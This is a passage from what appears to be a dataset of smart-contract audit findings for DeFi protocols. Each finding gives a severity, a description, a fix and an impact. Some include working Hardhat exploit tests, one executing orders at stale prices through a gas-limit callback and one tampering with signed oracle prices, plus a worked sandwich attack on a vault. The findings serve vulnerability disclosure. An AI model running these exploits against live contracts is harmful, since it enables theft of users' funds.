marketIncrease close to gasLimit then using the callback contract that you passed as a param in:\\nan exceeding the block.gasLimit in the callback.\\nAfter \"x\" amount of blocks, change the gasUsage on the fallback, just that the transaction executes at the prior price.\\nPoC on how to execute the transaction with old pricing:\\n```\\nimport { expect } from \"chai\";\\nimport { mine } from \"@nomicfoundation/hardhat-network-helpers\";\\nimport { OrderType, getOrderCount, getOrderKeys, createOrder, executeOrder, handleOrder } from \"../utils/order\";\\nimport { expandDecimals, decimalToFloat } from \"../utils/math\";\\nimport { deployFixture } from \"../utils/fixture\";\\n import { handleDeposit } from \"../utils/deposit\";\\nimport { getPositionCount, getAccountPositionCount } from \"../utils/position\";\\n\\ndescribe(\"Execute transaction with all prices\", () => {\\nlet fixture,\\nuser0,\\nuser1,\\nuser2,\\nreader,\\ndataStore,\\nethUsdMarket,\\nethUsdSpotOnlyMarket,\\nwnt,\\nusdc,\\nattackContract,\\noracle,\\ndepositVault,\\nexchangeRouter,\\nswapHandler,\\nexecutionFee;\\n\\n beforeEach(async () => {\\n fixture = await deployFixture();\\n\\n ({ user0, user1, user2 } = fixture.accounts);\\n ({\\n reader,\\n dataStore,\\n oracle,\\n depositVault,\\n ethUsdMarket,\\n ethUsdSpotOnlyMarket,\\n wnt,\\n usdc,\\n attackContract,\\n exchangeRouter,\\n swapHandler,\\n } = fixture.contracts);\\n ({ executionFee } = fixture.props);\\n\\n await handleDeposit(fixture, {\\n create: {\\n market: ethUsdMarket,\\n longTokenAmount: expandDecimals(10000000, 18),\\n shortTokenAmount: expandDecimals(10000000 * 5000, 6),\\n },\\n });\\n await handleDeposit(fixture, {\\n create: {\\n market: ethUsdSpotOnlyMarket,\\n longTokenAmount: expandDecimals(10000000, 18),\\n shortTokenAmount: expandDecimals(10000000 * 5000, 6),\\n },\\n });\\n });\\n\\n it(\"Old price order execution\", async () => {\\n const path = [];\\n const UsdcBal = expandDecimals(50 * 1000, 6);\\n expect(await getOrderCount(dataStore)).eq(0);\\n\\n for (let i = 0; i < 63; i++) {\\n if (i % 2 == 0) path.push(ethUsdMarket.marketToken);\\n else path.push(ethUsdSpotOnlyMarket.marketToken);\\n }\\n\\n const params = {\\n account: attackContract,\\n callbackContract: attackContract,\\n callbackGasLimit: 1900000,\\n market: ethUsdMarket,\\n minOutputAmount: 0,\\n initialCollateralToken: usdc, // Collateral will get swapped to ETH by the swapPath -- 50k/$5k = 10 ETH Collateral\\n initialCollateralDeltaAmount: UsdcBal,\\n swapPath: path,\\n sizeDeltaUsd: decimalToFloat(200 * 1000), // 4x leverage -- position size is 40 ETH\\n acceptablePrice: expandDecimals(5001, 12),\\n orderType: OrderType.MarketIncrease,\\n isLong: true,\\n shouldUnwrapNativeToken: false,\\n gasUsageLabel: \"createOrder\",\\n };\\n\\n // Create a MarketIncrease order that will run out of gas doing callback\\n await createOrder(fixture, params);\\n expect(await getOrderCount(dataStore)).eq(1);\\n expect(await getAccountPositionCount(dataStore, attackContract.address)).eq(0);\\n expect(await getPositionCount(dataStore)).eq(0);\\n expect(await getAccountPositionCount(dataStore, attackContract.address)).eq(0);\\n\\n await expect(executeOrder(fixture)).to.be.reverted;\\n\\n await mine(50);\\n\\n await attackContract.flipSwitch();\\n\\n expect(await getOrderCount(dataStore)).eq(1);\\n\\n await executeOrder(fixture, {\\n minPrices: [expandDecimals(5000, 4), expandDecimals(1, 6)],\\n maxPrices: [expandDecimals(5000, 4), expandDecimals(1, 6)],\\n });\\n\\n expect(await getOrderCount(dataStore)).eq(0);\\n expect(await getAccountPositionCount(dataStore, attackContract.address)).eq(1);\\n expect(await getPositionCount(dataStore)).eq(1);\\n\\n await handleOrder(fixture, {\\n create: {\\n account: attackContract,\\n market: ethUsdMarket,\\n initialCollateralToken: wnt,\\n initialCollateralDeltaAmount: 0,\\n sizeDeltaUsd: decimalToFloat(200 * 1000),\\n acceptablePrice: 6001,\\n orderType: OrderType.MarketDecrease,\\n isLong: true,\\n gasUsageLabel: \"orderHandler.createOrder\",\\n swapPath: [ethUsdMarket.marketToken],\\n },\\n execute: {\\n minPrices: [expandDecimals(6000, 4), expandDecimals(1, 6)],\\n maxPrices: [expandDecimals(6000, 4), expandDecimals(1, 6)],\\n gasUsageLabel: \"orderHandler.executeOrder\",\\n },\\n });\\n\\n const WNTAfter = await wnt.balanceOf(attackContract.address);\\n const UsdcAfter = await usdc.balanceOf(attackContract.address);\\n\\n expect(UsdcAfter).to.gt(\\n expandDecimals(100 * 1000, 6)\\n .mul(999)\\n .div(1000)\\n );\\n expect(UsdcAfter).to.lt(\\n expandDecimals(100 * 1000, 6)\\n .mul(1001)\\n .div(1000)\\n );\\n expect(WNTAfter).to.eq(0);\\n }).timeout(100000);\\n```\\nчThere need to be a way to cap the length of the path to control user input:\\nuint y = 10; require(swapPath.length < y ,\"path too long\");чThe attack would allow to make free trades in terms of risk. You can trade without any risk by conttroling when to execute the transactionч```\\n function createOrder(\\n DataStore dataStore,\\n EventEmitter eventEmitter,\\n OrderVault orderVault,\\n IReferralStorage referralStorage,\\n address account,\\n BaseOrderUtils.CreateOrderParams memory params\\n ) external returns (bytes32) {\\n ReferralUtils.setTraderReferralCode(referralStorage, account, params.referralCode);\\n\\n uint256 initialCollateralDeltaAmount;\\n\\n address wnt = TokenUtils.wnt(dataStore);\\n\\n bool shouldRecordSeparateExecutionFeeTransfer = true;\\n\\n if (\\n params.orderType == Order.OrderType.MarketSwap ||\\n params.orderType == Order.OrderType.LimitSwap ||\\n params.orderType == Order.OrderType.MarketIncrease ||\\n params.orderType == Order.OrderType.LimitIncrease\\n ) {\\n initialCollateralDeltaAmount = orderVault.recordTransferIn(params.addresses.initialCollateralToken);\\n if (params.addresses.initialCollateralToken == wnt) {\\n if (initialCollateralDeltaAmount < params.numbers.executionFee) {\\n revert InsufficientWntAmountForExecutionFee(initialCollateralDeltaAmount, params.numbers.executionFee);\\n }\\n initialCollateralDeltaAmount -= params.numbers.executionFee;\\n shouldRecordSeparateExecutionFeeTransfer = false;\\n }\\n } else if (\\n params.orderType == Order.OrderType.MarketDecrease ||\\n params.orderType == Order.OrderType.LimitDecrease ||\\n params.orderType == Order.OrderType.StopLossDecrease\\n ) {\\n initialCollateralDeltaAmount = params.numbers.initialCollateralDeltaAmount;\\n } else {\\n revert OrderTypeCannotBeCreated(params.orderType);\\n }\\n\\n if (shouldRecordSeparateExecutionFeeTransfer) {\\n uint256 wntAmount = orderVault.recordTransferIn(wnt);\\n if (wntAmount < params.numbers.executionFee) {\\n revert InsufficientWntAmountForExecutionFee(wntAmount, params.numbers.executionFee);\\n }\\n\\n GasUtils.handleExcessExecutionFee(\\n dataStore,\\n orderVault,\\n wntAmount,\\n params.numbers.executionFee\\n );\\n }\\n\\n // validate swap path markets\\n MarketUtils.getEnabledMarkets(\\n dataStore,\\n params.addresses.swapPath\\n );\\n\\n Order.Props memory order;\\n\\n order.setAccount(account);\\n order.setReceiver(params.addresses.receiver);\\n order.setCallbackContract(params.addresses.callbackContract);\\n order.setMarket(params.addresses.market);\\n order.setInitialCollateralToken(params.addresses.initialCollateralToken);\\n order.setSwapPath(params.addresses.swapPath);\\n order.setOrderType(params.orderType);\\n order.setDecreasePositionSwapType(params.decreasePositionSwapType);\\n order.setSizeDeltaUsd(params.numbers.sizeDeltaUsd);\\n order.setInitialCollateralDeltaAmount(initialCollateralDeltaAmount);\\n order.setTriggerPrice(params.numbers.triggerPrice);\\n order.setAcceptablePrice(params.numbers.acceptablePrice);\\n order.setExecutionFee(params.numbers.executionFee);\\n order.setCallbackGasLimit(params.numbers.callbackGasLimit);\\n order.setMinOutputAmount(params.numbers.minOutputAmount);\\n order.setIsLong(params.isLong);\\n order.setShouldUnwrapNativeToken(params.shouldUnwrapNativeToken);\\n\\n ReceiverUtils.validateReceiver(order.receiver());\\n\\n if (order.initialCollateralDeltaAmount() == 0 && order.sizeDeltaUsd() == 0) {\\n revert BaseOrderUtils.EmptyOrder();\\n }\\n\\n CallbackUtils.validateCallbackGasLimit(dataStore, order.callbackGasLimit());\\n\\n uint256 estimatedGasLimit = GasUtils.estimateExecuteOrderGasLimit(dataStore, order);\\n GasUtils.validateExecutionFee(dataStore, estimatedGasLimit, order.executionFee());\\n\\n bytes32 key = NonceUtils.getNextKey(dataStore);\\n\\n order.touch();\\n OrderStoreUtils.set(dataStore, key, order);\\n\\n OrderEventUtils.emitOrderCreated(eventEmitter, key, order);\\n\\n return key;\\n}\\n```\\n -Multiplication after Division error leading to larger precision lossчmediumчThere are couple of instance of using result of a division for multiplication while can cause larger precision loss.\\n```\\nFile: MarketUtils.sol\\n\\n cache.fundingUsd = (cache.sizeOfLargerSide / Precision.FLOAT_PRECISION) * cache.durationInSeconds * cache.fundingFactorPerSecond;\\n\\n if (result.longsPayShorts) {\\n cache.fundingUsdForLongCollateral = cache.fundingUsd * cache.oi.longOpenInterestWithLongCollateral / cache.oi.longOpenInterest;\\n cache.fundingUsdForShortCollateral = cache.fundingUsd * cache.oi.longOpenInterestWithShortCollateral / cache.oi.longOpenInterest;\\n } else {\\n cache.fundingUsdForLongCollateral = cache.fundingUsd * cache.oi.shortOpenInterestWithLongCollateral / cache.oi.shortOpenInterest;\\n cache.fundingUsdForShortCollateral = cache.fundingUsd * cache.oi.shortOpenInterestWithShortCollateral / cache.oi.shortOpenInterest;\\n }\\n```\\n\\nLink to Code\\nIn above case, value of `cache.fundingUsd` is calculated by first dividing `cache.sizeOfLargerSide` with `Precision.FLOAT_PRECISION` which is `10**30`. Then the resultant is multiplied further. This result in larger Loss of precision.\\nLater the same `cache.fundingUsd` is used to calculate `cache.fundingUsdForLongCollateral` and `cache.fundingUsdForShortCollateral` by multiplying further which makes the precision error even more big.\\nSame issue is there in calculating `cache.positionPnlUsd` in `PositionUtils`.\\n```\\nFile: PositionUtils.sol\\n\\n if (position.isLong()) {\\n cache.sizeDeltaInTokens = Calc.roundUpDivision(position.sizeInTokens() * sizeDeltaUsd, position.sizeInUsd());\\n } else {\\n cache.sizeDeltaInTokens = position.sizeInTokens() * sizeDeltaUsd / position.sizeInUsd();\\n }\\n }\\n\\n cache.positionPnlUsd = cache.totalPositionPnl * cache.sizeDeltaInTokens.toInt256() / position.sizeInTokens().toInt256();\\n```\\n\\nLink to CodeчFirst Multiply all the numerators and then divide it by the product of all the denominator.чPrecision Loss in accounting.ч```\\nFile: MarketUtils.sol\\n\\n cache.fundingUsd = (cache.sizeOfLargerSide / Precision.FLOAT_PRECISION) * cache.durationInSeconds * cache.fundingFactorPerSecond;\\n\\n if (result.longsPayShorts) {\\n cache.fundingUsdForLongCollateral = cache.fundingUsd * cache.oi.longOpenInterestWithLongCollateral / cache.oi.longOpenInterest;\\n cache.fundingUsdForShortCollateral = cache.fundingUsd * cache.oi.longOpenInterestWithShortCollateral / cache.oi.longOpenInterest;\\n } else {\\n cache.fundingUsdForLongCollateral = cache.fundingUsd * cache.oi.shortOpenInterestWithLongCollateral / cache.oi.shortOpenInterest;\\n cache.fundingUsdForShortCollateral = cache.fundingUsd * cache.oi.shortOpenInterestWithShortCollateral / cache.oi.shortOpenInterest;\\n }\\n```\\n -when execute deposit fails, cancel deposit will be called which means that execution fee for keeper will be little for executing the cancellation depending on where the executeDeposit failsчmediumчWhen execute deposit fails, the deposit will be automatically cancelled. However, since executeDeposit has taken up a portion of the execution fee, execution fee left for cancellation might be little and keeper will lose out on execution fee.\\nIn `executeDeposit` when an error is thrown, `_handleDepositError` is called.\\n```\\n _handleDepositError(\\n key,\\n startingGas,\\n reasonBytes\\n );\\n```\\n\\nNotice that in `_handleDepositError` that `cancelDeposit` is called which will pay execution fee to the keeper. However, since the failure can have failed at the late stage of executeDeposit, the execution fee left for the cancellation will be little for the keeper.\\n```\\n function _handleDepositError(\\n bytes32 key,\\n uint256 startingGas,\\n bytes memory reasonBytes\\n ) internal {\\n (string memory reason, /* bool hasRevertMessage */) = ErrorUtils.getRevertMessage(reasonBytes);\\n\\n\\n bytes4 errorSelector = ErrorUtils.getErrorSelectorFromData(reasonBytes);\\n\\n\\n if (OracleUtils.isEmptyPriceError(errorSelector)) {\\n ErrorUtils.revertWithCustomError(reasonBytes);\\n }\\n\\n\\n DepositUtils.cancelDeposit(\\n dataStore,\\n eventEmitter,\\n depositVault,\\n key,\\n msg.sender,\\n startingGas,\\n reason,\\n reasonBytes\\n );\\n }\\n}\\n```\\n\\nNote: This also applies to failed `executeWithdrawal`.чRecommend increasing the minimum required execution fee to account for failed deposit and refund the excess to the user when a deposit succeeds.чKeeper will lose out on execution fee in the event of a failed deposit.ч```\\n _handleDepositError(\\n key,\\n startingGas,\\n reasonBytes\\n );\\n```\\n -The oracle price could be tamperedчmediumчThe `_setPrices()` function is missing to check duplicated prices indexes. Attackers such as malicious order keepers can exploit it to tamper signed prices.\\nThe following test script shows how it works\\n```\\nimport { expect } from \"chai\";\\n\\nimport { deployContract } from \"../../utils/deploy\";\\nimport { deployFixture } from \"../../utils/fixture\";\\nimport {\\n TOKEN_ORACLE_TYPES,\\n signPrices,\\n getSignerInfo,\\n getCompactedPrices,\\n getCompactedPriceIndexes,\\n getCompactedDecimals,\\n getCompactedOracleBlockNumbers,\\n getCompactedOracleTimestamps,\\n} from \"../../utils/oracle\";\\nimport { printGasUsage } from \"../../utils/gas\";\\nimport { grantRole } from \"../../utils/role\";\\nimport * as keys from \"../../utils/keys\";\\n\\ndescribe(\"AttackOracle\", () => {\\n const { provider } = ethers;\\n\\n let user0, signer0, signer1, signer2, signer3, signer4, signer7, signer9;\\n let roleStore, dataStore, eventEmitter, oracleStore, oracle, wnt, wbtc, usdc;\\n let oracleSalt;\\n\\n beforeEach(async () => {\\n const fixture = await deployFixture();\\n ({ user0, signer0, signer1, signer2, signer3, signer4, signer7, signer9 } = fixture.accounts);\\n\\n ({ roleStore, dataStore, eventEmitter, oracleStore, oracle, wnt, wbtc, usdc } = fixture.contracts);\\n ({ oracleSalt } = fixture.props);\\n });\\n\\n it(\"inits\", async () => {\\n expect(await oracle.oracleStore()).to.eq(oracleStore.address);\\n expect(await oracle.SALT()).to.eq(oracleSalt);\\n });\\n\\n it(\"tamperPrices\", async () => {\\n const blockNumber = (await provider.getBlock()).number;\\n const blockTimestamp = (await provider.getBlock()).timestamp;\\n await dataStore.setUint(keys.MIN_ORACLE_SIGNERS, 2);\\n const block = await provider.getBlock(blockNumber);\\n\\n let signerInfo = getSignerInfo([0, 1]);\\n let minPrices = [1000, 1000]; // if some signers sign a same price\\n let maxPrices = [1010, 1010]; // if some signers sign a same price\\n let signatures = await signPrices({\\n signers: [signer0, signer1],\\n salt: oracleSalt,\\n minOracleBlockNumber: blockNumber,\\n maxOracleBlockNumber: blockNumber,\\n oracleTimestamp: blockTimestamp,\\n blockHash: block.hash,\\n token: wnt.address,\\n tokenOracleType: TOKEN_ORACLE_TYPES.DEFAULT,\\n precision: 1,\\n minPrices,\\n maxPrices,\\n });\\n\\n // attacker tamper the prices and indexes\\n minPrices[1] = 2000\\n maxPrices[1] = 2020\\n let indexes = getCompactedPriceIndexes([0, 0]) // share the same index\\n\\n await oracle.setPrices(dataStore.address, eventEmitter.address, {\\n priceFeedTokens: [],\\n signerInfo,\\n tokens: [wnt.address],\\n compactedMinOracleBlockNumbers: [blockNumber],\\n compactedMaxOracleBlockNumbers: [blockNumber],\\n compactedOracleTimestamps: [blockTimestamp],\\n compactedDecimals: getCompactedDecimals([1]),\\n compactedMinPrices: getCompactedPrices(minPrices),\\n compactedMinPricesIndexes: indexes,\\n compactedMaxPrices: getCompactedPrices(maxPrices),\\n compactedMaxPricesIndexes: indexes,\\n signatures,\\n });\\n\\n const decimals = 10\\n expect((await oracle.getPrimaryPrice(wnt.address)).min).eq(1500 * decimals);\\n expect((await oracle.getPrimaryPrice(wnt.address)).max).eq(1515 * decimals);\\n });\\n\\n});\\n```\\n\\nThe output\\n```\\n> npx hardhat test .\\test\\oracle\\AttackOracle.ts\\n\\n\\n AttackOracle\\n √ inits\\n √ tamperPrices (105ms)\\n\\n\\n 2 passing (13s)\\n```\\nчDon't allow duplicated prices indexesчSteal funds from the vault and markets.ч```\\nimport { expect } from \"chai\";\\n\\nimport { deployContract } from \"../../utils/deploy\";\\nimport { deployFixture } from \"../../utils/fixture\";\\nimport {\\n TOKEN_ORACLE_TYPES,\\n signPrices,\\n getSignerInfo,\\n getCompactedPrices,\\n getCompactedPriceIndexes,\\n getCompactedDecimals,\\n getCompactedOracleBlockNumbers,\\n getCompactedOracleTimestamps,\\n} from \"../../utils/oracle\";\\nimport { printGasUsage } from \"../../utils/gas\";\\nimport { grantRole } from \"../../utils/role\";\\nimport * as keys from \"../../utils/keys\";\\n\\ndescribe(\"AttackOracle\", () => {\\n const { provider } = ethers;\\n\\n let user0, signer0, signer1, signer2, signer3, signer4, signer7, signer9;\\n let roleStore, dataStore, eventEmitter, oracleStore, oracle, wnt, wbtc, usdc;\\n let oracleSalt;\\n\\n beforeEach(async () => {\\n const fixture = await deployFixture();\\n ({ user0, signer0, signer1, signer2, signer3, signer4, signer7, signer9 } = fixture.accounts);\\n\\n ({ roleStore, dataStore, eventEmitter, oracleStore, oracle, wnt, wbtc, usdc } = fixture.contracts);\\n ({ oracleSalt } = fixture.props);\\n });\\n\\n it(\"inits\", async () => {\\n expect(await oracle.oracleStore()).to.eq(oracleStore.address);\\n expect(await oracle.SALT()).to.eq(oracleSalt);\\n });\\n\\n it(\"tamperPrices\", async () => {\\n const blockNumber = (await provider.getBlock()).number;\\n const blockTimestamp = (await provider.getBlock()).timestamp;\\n await dataStore.setUint(keys.MIN_ORACLE_SIGNERS, 2);\\n const block = await provider.getBlock(blockNumber);\\n\\n let signerInfo = getSignerInfo([0, 1]);\\n let minPrices = [1000, 1000]; // if some signers sign a same price\\n let maxPrices = [1010, 1010]; // if some signers sign a same price\\n let signatures = await signPrices({\\n signers: [signer0, signer1],\\n salt: oracleSalt,\\n minOracleBlockNumber: blockNumber,\\n maxOracleBlockNumber: blockNumber,\\n oracleTimestamp: blockTimestamp,\\n blockHash: block.hash,\\n token: wnt.address,\\n tokenOracleType: TOKEN_ORACLE_TYPES.DEFAULT,\\n precision: 1,\\n minPrices,\\n maxPrices,\\n });\\n\\n // attacker tamper the prices and indexes\\n minPrices[1] = 2000\\n maxPrices[1] = 2020\\n let indexes = getCompactedPriceIndexes([0, 0]) // share the same index\\n\\n await oracle.setPrices(dataStore.address, eventEmitter.address, {\\n priceFeedTokens: [],\\n signerInfo,\\n tokens: [wnt.address],\\n compactedMinOracleBlockNumbers: [blockNumber],\\n compactedMaxOracleBlockNumbers: [blockNumber],\\n compactedOracleTimestamps: [blockTimestamp],\\n compactedDecimals: getCompactedDecimals([1]),\\n compactedMinPrices: getCompactedPrices(minPrices),\\n compactedMinPricesIndexes: indexes,\\n compactedMaxPrices: getCompactedPrices(maxPrices),\\n compactedMaxPricesIndexes: indexes,\\n signatures,\\n });\\n\\n const decimals = 10\\n expect((await oracle.getPrimaryPrice(wnt.address)).min).eq(1500 * decimals);\\n expect((await oracle.getPrimaryPrice(wnt.address)).max).eq(1515 * decimals);\\n });\\n\\n});\\n```\\n -boundedSub() might fail to return the result that is bounded to prevent overflowsчmediumчThe goal of `boundedSub()` is to bound the result regardless what the inputs are to prevent overflows/underflows. However, the goal is not achieved for some cases. As a result, `boundedSub()` still might underflow and still might revert. The goal of the function is not achieved.\\nAs a result, the protocol might not be fault-tolerant as it is supposed to be - when `boundedSub()` is designed to not revert in any case, it still might revert. For example, function `MarketUtils.getNextFundingAmountPerSize()` will be affected.\\n`boundedSub()` is designed to always bound its result between `type(int256).min` and `type(int256).max` so that it will never overflow/underflow:\\nIt achieves its goal in three cases:\\nCase 1: `if either a or b is zero or the signs are the same there should not be any overflow`.\\nCase 2: `a > 0`, and `b < 0`, and `a-b > type(int256).max`, then we need to return `type(int256).max`.\\nCase 3: `a < 0`, and `b > 0`, and a - b < `type(int256).min`, then we need to return `type(int256).min`\\nUnfortunately, the third case is implemented wrongly as follows:\\n```\\n // if subtracting `b` from `a` would result in a value less than the min int256 value\\n // then return the min int256 value\\n if (a < 0 && b <= type(int256).min - a) {\\n return type(int256).min;\\n }\\n```\\n\\nwhich essentially is checking a < 0 && b + a <= `type(int256).min`, a wrong condition to check. Because of using this wrong condition, underflow cases will not be detected and the function will revert instead of returning `type(int256).min` in this case.\\nTo verify, suppose a = `type(int256).min` and b = 1, `a-b` needs to be bounded to prevent underflow and the function should have returned `type(int256).min`. However, the function will fail the condition, as a result, it will not execute the if part, and the following final line will be executed instead:\\n```\\nreturn a - b;\\n```\\n\\nAs a result, instead of returning the minimum, the function will revert in the last line due to underflow. This violates the property of the function: it should have returned the bounded result `type(int256).min` and should not have reverted in any case.\\nThe following POC in Remix can show that the following function will revert:\\n```\\nfunction testBoundedSub() public pure returns (int256){\\n return boundedSub(type(int256).min+3, 4);\\n}\\n```\\nчThe correction is as follows:\\n```\\n function boundedSub(int256 a, int256 b) internal pure returns (int256) {\\n // if either a or b is zero or the signs are the same there should not be any overflow\\n if (a == 0 || b == 0 || (a > 0 && b > 0) || (a < 0 && b < 0)) {\\n return a // Remove the line below\\n b;\\n }\\n\\n // if adding `// Remove the line below\\nb` to `a` would result in a value greater than the max int256 value\\n // then return the max int256 value\\n if (a > 0 && // Remove the line below\\nb >= type(int256).max // Remove the line below\\n a) {\\n return type(int256).max;\\n }\\n\\n // if subtracting `b` from `a` would result in a value less than the min int256 value\\n // then return the min int256 value\\n// Remove the line below\\n if (a < 0 && b <= type(int256).min // Remove the line below\\n a) {\\n// Add the line below\\n if (a < 0 && a <= type(int256).min // Add the line below\\n b) {\\n return type(int256).min;\\n }\\n\\n return a // Remove the line below\\n b;\\n }\\n```\\nч`boundedSub()` does not guarantee underflow/overflow free as it is designed to be. As a result, the protocol might break at points when it is not supposed to break. For example, function `MarketUtils.getNextFundingAmountPerSize()` will be affected.ч```\\n // if subtracting `b` from `a` would result in a value less than the min int256 value\\n // then return the min int256 value\\n if (a < 0 && b <= type(int256).min - a) {\\n return type(int256).min;\\n }\\n```\\n -Adversary can sandwich oracle updates to exploit vaultчhighчBLVaultLido added a mechanism to siphon off all wstETH obtained from mismatched pool and oracle prices. This was implemented to fix the problem that the vault could be manipulated to the attackers gain. This mitigation however does not fully address the issue and the same issue is still exploitable by sandwiching oracle update.\\nBLVaultLido.sol#L232-L240\\n```\\n uint256 wstethOhmPrice = manager.getTknOhmPrice();\\n uint256 expectedWstethAmountOut = (ohmAmountOut * wstethOhmPrice) / _OHM_DECIMALS;\\n\\n // Take any arbs relative to the oracle price for the Treasury and return the rest to the owner\\n uint256 wstethToReturn = wstethAmountOut > expectedWstethAmountOut\\n ? expectedWstethAmountOut\\n : wstethAmountOut;\\n if (wstethAmountOut > wstethToReturn)\\n wsteth.safeTransfer(TRSRY(), wstethAmountOut - wstethToReturn);\\n```\\n\\nIn the above lines we can see that the current oracle price is used to calculate the expected amount of wstETH to return to the user. In theory this should prevent the attack but an attacker can side step this sandwiching the oracle update.\\nExample:\\nThe POC is very similar to before except now it's composed of two transactions sandwiching the oracle update. Chainlink oracles have a tolerance threshold of 0.5% before updating so we will use that as our example value. The current price is assumed to be 0.995 wstETH/OHM. The oracle price (which is about to be updated) is currently 1:1\\n```\\nTransaction 1:\\n\\nBalances before attack (0.995:1)\\nLiquidity: 79.8 OHM 80.2 wstETH\\nAdversary: 20 wstETH\\n\\nSwap OHM so that pool price matches pre-update oracle price:\\nLiquidity: 80 OHM 80 wstETH\\nAdversary: -0.2 OHM 20.2 wstETH\\n\\nBalances after adversary has deposited to the pool:\\nLiquidity: 100 OHM 100 wstETH\\nAdversary: -0.2 OHM 0.2 wstETH\\n\\nBalances after adversary sells wstETH for OHM (0.5% movement in price):\\nLiquidity: 99.748 OHM 100.252 wstETH\\nAdversary: 0.052 OHM -0.052 wstETH\\n\\nSandwiched Oracle Update:\\n\\nOracle updates price of wstETH to 0.995 OHM. Since the attacker already sold wstETH to balance \\nthe pool to the post-update price they will be able to withdraw the full amount of wstETH.\\n\\nTransaction 2:\\n\\nBalances after adversary removes their liquidity:\\nLiquidity: 79.798 OHM 80.202 wstETH\\nAdversary: 0.052 OHM 19.998 wstETH\\n\\nBalances after selling profited OHM:\\nLiquidity: 79.849 OHM 80.152 wstETH\\nAdversary: 20.05 wstETH\\n```\\n\\nAs shown above it's still profitable to exploit the vault by sandwiching the oracle updates. With each oracle update the pool can be repeatedly attacked causing large losses.чTo prevent this I would recommend locking the user into the vault for some minimum amount of time (i.e. 24 hours)чVault will be attacked repeatedly for large lossesч```\\n uint256 wstethOhmPrice = manager.getTknOhmPrice();\\n uint256 expectedWstethAmountOut = (ohmAmountOut * wstethOhmPrice) / _OHM_DECIMALS;\\n\\n // Take any arbs relative to the oracle price for the Treasury and return the rest to the owner\\n uint256 wstethToReturn = wstethAmountOut > expectedWstethAmountOut\\n ? expectedWstethAmountOut\\n : wstethAmountOut;\\n if (wstethAmountOut > wstethToReturn)\\n wsteth.safeTransfer(TRSRY(), wstethAmountOut - wstethToReturn);\\n```\\n -minTokenAmounts_ is useless in new configuration and doesn't provide any real slippage protectionчhighчBLVaultLido#withdraw skims off extra stETH from the user that results from oracle arb. The problem with this is that minTokenAmounts_ no longer provides any slippage protection because it only ensures that enough is received from the liquidity pool but never enforces how much is received by the user.\\nBLVaultLido.sol#L224-L247\\n```\\n _exitBalancerPool(lpAmount_, minTokenAmounts_);\\n\\n // Calculate OHM and wstETH amounts received\\n uint256 ohmAmountOut = ohm.balanceOf(address(this)) - ohmBefore;\\n uint256 wstethAmountOut = wsteth.balanceOf(address(this)) - wstethBefore;\\n\\n // Calculate oracle expected wstETH received amount\\n // getTknOhmPrice returns the amount of wstETH per 1 OHM based on the oracle price\\n uint256 wstethOhmPrice = manager.getTknOhmPrice();\\n uint256 expectedWstethAmountOut = (ohmAmountOut * wstethOhmPrice) / _OHM_DECIMALS;\\n\\n // Take any arbs relative to the oracle price for the Treasury and return the rest to the owner\\n uint256 wstethToReturn = wstethAmountOut > expectedWstethAmountOut\\n ? expectedWstethAmountOut\\n : wstethAmountOut;\\n if (wstethAmountOut > wstethToReturn)\\n wsteth.safeTransfer(TRSRY(), wstethAmountOut - wstethToReturn);\\n\\n // Burn OHM\\n ohm.increaseAllowance(MINTR(), ohmAmountOut);\\n manager.burnOhmFromVault(ohmAmountOut);\\n\\n // Return wstETH to owner\\n wsteth.safeTransfer(msg.sender, wstethToReturn);\\n```\\n\\nminTokenAmounts_ only applies to the removal of liquidity. Since wstETH is skimmed off to the treasury the user no longer has any way to protect themselves from slippage. As shown in my other submission, oracle slop can lead to loss of funds due to this skimming.чAllow the user to specify the amount of wstETH they receive AFTER the arb is skimmed.чUsers cannot protect themselves from oracle slop/wstETH skimmingч```\\n _exitBalancerPool(lpAmount_, minTokenAmounts_);\\n\\n // Calculate OHM and wstETH amounts received\\n uint256 ohmAmountOut = ohm.balanceOf(address(this)) - ohmBefore;\\n uint256 wstethAmountOut = wsteth.balanceOf(address(this)) - wstethBefore;\\n\\n // Calculate oracle expected wstETH received amount\\n // getTknOhmPrice returns the amount of wstETH per 1 OHM based on the oracle price\\n uint256 wstethOhmPrice = manager.getTknOhmPrice();\\n uint256 expectedWstethAmountOut = (ohmAmountOut * wstethOhmPrice) / _OHM_DECIMALS;\\n\\n // Take any arbs relative to the oracle price for the Treasury and return the rest to the owner\\n uint256 wstethToReturn = wstethAmountOut > expectedWstethAmountOut\\n ? expectedWstethAmountOut\\n : wstethAmountOut;\\n if (wstethAmountOut > wstethToReturn)\\n wsteth.safeTransfer(TRSRY(), wstethAmountOut - wstethToReturn);\\n\\n // Burn OHM\\n ohm.increaseAllowance(MINTR(), ohmAmountOut);\\n manager.burnOhmFromVault(ohmAmountOut);\\n\\n // Return wstETH to owner\\n wsteth.safeTransfer(msg.sender, wstethToReturn);\\n```\\n -Adversary can stake LP directly for the vault then withdraw to break lp accounting in BLVaultManagerLidoчhighчThe AuraRewardPool allows users to stake directly for other users. In this case the malicious user could stake LP directly for their vault then call withdraw on their vault. This would cause the LP tracking to break on BLVaultManagerLido. The result is that some users would now be permanently trapped because their vault would revert when trying to withdraw.\\nBaseRewardPool.sol#L196-L207\\n```\\nfunction stakeFor(address _for, uint256 _amount)\\n public\\n returns(bool)\\n{\\n _processStake(_amount, _for);\\n\\n //take away from sender\\n stakingToken.safeTransferFrom(msg.sender, address(this), _amount);\\n emit Staked(_for, _amount);\\n \\n return true;\\n}\\n```\\n\\nAuraRewardPool allows users to stake directly for another address with them receiving the staked tokens.\\nBLVaultLido.sol#L218-L224\\n```\\n manager.decreaseTotalLp(lpAmount_);\\n\\n // Unstake from Aura\\n auraRewardPool().withdrawAndUnwrap(lpAmount_, claim_);\\n\\n // Exit Balancer pool\\n _exitBalancerPool(lpAmount_, minTokenAmounts_);\\n```\\n\\nOnce the LP has been stake the adversary can immediately withdraw it from their vault. This calls decreaseTotalLP on BLVaultManagerLido which now permanently break the LP account.\\nBLVaultManagerLido.sol#L277-L280\\n```\\nfunction decreaseTotalLp(uint256 amount_) external override onlyWhileActive onlyVault {\\n if (amount_ > totalLp) revert BLManagerLido_InvalidLpAmount();\\n totalLp -= amount_;\\n}\\n```\\n\\nIf the amount_ is ever greater than totalLP it will cause decreaseTotalLP to revert. By withdrawing LP that was never deposited to a vault, it permanently breaks other users from being able to withdraw.\\nExample: User A deposits wstETH to their vault which yields 50 LP. User B creates a vault then stake 50 LP and withdraws it from his vault. The manager now thinks there is 0 LP in vaults. When User A tries to withdraw their LP it will revert when it calls manger.decreaseTotalLp. User A is now permanently trapped in the vault.чIndividual vaults should track how much they have deposited and shouldn't be allowed to withdraw more than deposited.чLP accounting is broken and users are permanently 